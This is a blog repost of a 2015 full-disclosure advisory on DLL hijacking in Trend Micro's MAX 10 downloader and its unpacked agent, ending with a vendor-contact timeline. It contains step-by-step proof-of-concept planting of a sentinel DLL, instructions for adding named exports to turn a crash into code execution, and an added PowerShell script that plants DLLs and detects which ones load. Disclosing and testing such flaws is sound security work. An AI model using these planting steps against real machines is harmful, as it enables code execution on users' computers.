
K8拉登哥哥's Blog

K8 team [K8team]: information security, network security, 0day vulnerabilities, penetration testing, hacking

[Privilege escalation] Trend Micro antivirus DLL hijacking

2016-04-19 17:25:47 | Category: privilege escalation tools

TrendMicro_MAX_10.0_US-en_Downloader.exe (available from
<http://trial.trendmicro.com/US/TM/2016/TrendMicro_MAX_10.0_US-en_Downloader.exe>)
loads and executes ProfAPI.dll and UXTheme.dll (and other DLLs
too) if they are present in the directory it is started from
(the "application directory"), because the default DLL search
order looks there first.

For software downloaded with a web browser the application
directory is typically the user's "Downloads" directory: see
<https://insights.sei.cmu.edu/cert/2008/09/carpet-bombing-and-directory-poisoning.html>,
<http://blog.acrossecurity.com/2012/02/downloads-folder-binary-planting.html>
and <http://seclists.org/fulldisclosure/2012/Aug/134>

If one of the DLLs named above is planted in the user's
"Downloads" directory via a "drive-by download" or "social
engineering", this vulnerability becomes remote code execution.


Proof of concept/demonstration:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

1. visit <http://home.arcor.de/skanthak/sentinel.html>, download
   <http://home.arcor.de/skanthak/download/SENTINEL.DLL>, save it
   as UXTheme.dll in your "Downloads" directory, then copy it as
   ProfAPI.dll;

2. download TrendMicro_MAX_10.0_US-en_Downloader.exe and save it
   in your "Downloads" directory;

3. execute TrendMicro_MAX_10.0_US-en_Downloader.exe from your
   "Downloads" directory;

4. notice the message boxes displayed from the DLLs placed in step 1.

PWNED!


For a denial of service instead of arbitrary (remote) code execution
copy the downloaded UXTheme.dll as OLEAcc.dll and WinSpool.drv: the
sentinel DLL does not provide the exports the program imports under
those names, so the loader fails to resolve them and aborts the
process before the planted DLL's entry point runs.
This is easily turned into arbitrary (remote) code execution too:
just add the exports OpenPrinterW, ClosePrinter and DocumentPropertiesW
(for WinSpool.drv) or LresultFromObject and CreateStdAccessibleObject
(for OLEAcc.dll) to the DLL.


See <http://seclists.org/fulldisclosure/2015/Nov/101> and
<http://seclists.org/fulldisclosure/2015/Dec/86> as well as
<http://home.arcor.de/skanthak/sentinel.html> and the still unfinished
<http://home.arcor.de/skanthak/!execute.html> for more details about
this well-known and well-documented BEGINNER'S error and why
executable installers (and self-extractors too) are bad.


Additionally, TrendMicro_MAX_10.0_US-en_Downloader.exe creates an
unsafe temporary directory, unpacks its payload into it and
executes the payload from there.

...\TrendMicro_MAX_10.0_US-en_Downloader\Agent\TisEzIns.exe loads
and executes multiple DLLs too from its unsafe application directory:
ProfAPI.dll, NTMarta.dll, RASAdHlp.dll, NTShrUI.dll, UXTheme.dll and
Secur32.dll plus WinMM.dll, Version.dll, WinSpool.drv, WinHttp.dll
and OLEAcc.dll


Proof of concept/demonstration:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

5. unpack TrendMicro_MAX_10.0_US-en_Downloader.exe (basically a
   7-Zip self-extractor) into an arbitrary directory, say "%TEMP%"
   (this creates a subdirectory "%TEMP%\Agent" with the payload);

6. copy the downloaded UXTheme.dll from step 1 into "%TEMP%\Agent",
   then copy it as ProfAPI.dll, NTMarta.dll, RASAdHlp.dll, NTShrUI.dll,
   Secur32.dll plus WinMM.dll, Version.dll, WinSpool.drv, WinHttp.dll
   and OLEAcc.dll there;

7. execute "%TEMP%\Agent\TisEZIns.exe";

8. notice the message boxes displayed from the DLLs placed in steps 5
   and 6.

PWNED!
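Both demonstrations above (steps 1-4 against the downloader, steps 5-8 against the unpacked agent) rely on a human noticing message boxes. The PowerShell script below is an added example, not part of the advisory or of any Trend Micro or Kanthak tooling: it plants a sentinel DLL under the names the advisory lists, starts the executable from its own directory, and then reads the process's module list to report which names were resolved from the application directory instead of System32. It also checks the names against the KnownDLLs registry key, since a KnownDLL is mapped from the \KnownDlls object directory and cannot be hijacked this way. The paths in the usage comment, the scratch directory name "dllplant" and the function names are assumptions; the script assumes you already have a valid sentinel DLL (such as the advisory's SENTINEL.DLL) of the same bitness as the target.

```powershell
# Added example, not from the advisory: plant a sentinel DLL under the names
# the advisory lists, run the target from its own directory, and confirm from
# the process's module list which names were taken from that directory.

# DLL names the advisory says are loaded from the application directory by
# the downloader and by the unpacked agent (TisEZIns.exe).
$DllNames = 'ProfAPI.dll', 'UXTheme.dll', 'OLEAcc.dll', 'WinSpool.drv',
            'NTMarta.dll', 'RASAdHlp.dll', 'NTShrUI.dll', 'Secur32.dll',
            'WinMM.dll', 'Version.dll', 'WinHttp.dll'

function Get-KnownDllNames {
    # KnownDLLs are mapped from \KnownDlls and never resolved through the
    # search path, so planting a copy in the application directory has no
    # effect on them. Every other name goes through the default search
    # order, which begins in the application directory.
    $key = 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs'
    (Get-ItemProperty -Path $key).PSObject.Properties |
        Where-Object { $_.Name -notlike 'PS*' -and $_.Name -notlike 'DllDirectory*' } |
        ForEach-Object { $_.Value.ToLowerInvariant() }
}

function Test-PlantableName {
    param([string[]]$Names = $DllNames)
    $known = @(Get-KnownDllNames)
    foreach ($n in $Names) {
        $isKnown = $known -contains $n.ToLowerInvariant()
        [pscustomobject]@{ Dll = $n; KnownDll = $isKnown; Plantable = -not $isKnown }
    }
}

function Invoke-PlantTest {
    param(
        [Parameter(Mandatory)][string]$Exe,       # target; it is run from its own directory
        [Parameter(Mandatory)][string]$Sentinel,  # benign DLL whose DllMain shows a message box
        [string[]]$Names = $DllNames,
        [int]$WaitSeconds = 5
    )
    $exePath = (Resolve-Path -Path $Exe).Path
    $appDir  = Split-Path -Path $exePath -Parent
    foreach ($n in $Names) {
        Copy-Item -Path $Sentinel -Destination (Join-Path $appDir $n) -Force
    }
    $p = Start-Process -FilePath $exePath -WorkingDirectory $appDir -PassThru
    Start-Sleep -Seconds $WaitSeconds
    if ($p.HasExited) {
        # The loader aborted the process (for example a missing export under a
        # statically imported name): the denial-of-service case, nothing to inspect.
        return [pscustomobject]@{ ProcessId = $p.Id; Exited = $true; HijackedModules = @() }
    }
    $p.Refresh()
    # Every module (other than the executable itself) whose path lies inside
    # the application directory was resolved from there instead of System32.
    $hijacked = $p.Modules |
        Where-Object { $_.FileName -like "$appDir\*" -and $_.FileName -ne $exePath } |
        Select-Object -ExpandProperty ModuleName
    [pscustomobject]@{ ProcessId = $p.Id; Exited = $false; HijackedModules = @($hijacked) }
}

# Usage (paths are assumptions; copy the downloader into a scratch directory
# first rather than running the test inside your real "Downloads" folder):
# Test-PlantableName | Format-Table
# Invoke-PlantTest -Exe "$env:TEMP\dllplant\TrendMicro_MAX_10.0_US-en_Downloader.exe" `
#                  -Sentinel "$env:USERPROFILE\Downloads\SENTINEL.DLL"
```

Two caveats: run this from a PowerShell of the same bitness as the target, since a 32-bit PowerShell cannot enumerate the modules of a 64-bit process; and if the installer relaunches itself elevated through UAC, the process object you hold is the unelevated launcher, so inspect the child instead. The sentinel's DllMain blocks on its message box while the loader lock is held, but the module is already mapped by then, so it still appears in the list.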


stay tuned
Stefan Kanthak


Timeline:
~~~~~~~~~

2015-12-20    multiple reports sent to vendor

2015-12-20    one report bounced due to braindead mail setup by vendor

2015-12-20    resent bounced report via alternative provider

2015-12-21    vendor acknowledges receipt and names further contact

2015-12-28    vendor verifies reports, can reproduce it on Windows 7

2015-12-30    vendor asks for verification:
              "We did not reproduce the vulnerability relating to
               ProfAPI.dll and UXTheme.dll on Windows 7."

2015-12-31    sent verification to vendor

2015-12-31    bounced due to braindead mail setup by vendor

<[email protected]>: host
    support.trendmicro.com.e0018.g0009.ng0090.im.emailsecurity.trendmicro.com[150.70.178.57]
    said: 554 5.7.1 <[email protected]>: Recipient address
    rejected: ERS-RBL. (in reply to RCPT TO command)

<[email protected]>: host sjdc-itpf-04.udc.trendmicro.com[66.180.82.132]
    said: 550 5.7.1 Service unavailable; Client host [151.189.21.43] blocked
    using Trend Micro RBL+. Please see
    http://www.mail-abuse.com/cgi-bin/lookup?ip_address=151.189.21.43; Mail
    from 151.189.21.43 blocked using Trend Micro Email Reputation database.
    Please see <http://www.mail-abuse.com/cgi-bin/lookup?151.189.21.43>;
    from=<<[email protected]> ; SIZE=8184> to=<<[email protected]>
    ; ORCPT=rfc822;[email protected]> proto=ESMTP
    helo=<mail-in-03.arcor-online.net> (in reply to end of DATA command)

2015-12-31    report published: vendor is obviously not interested in communication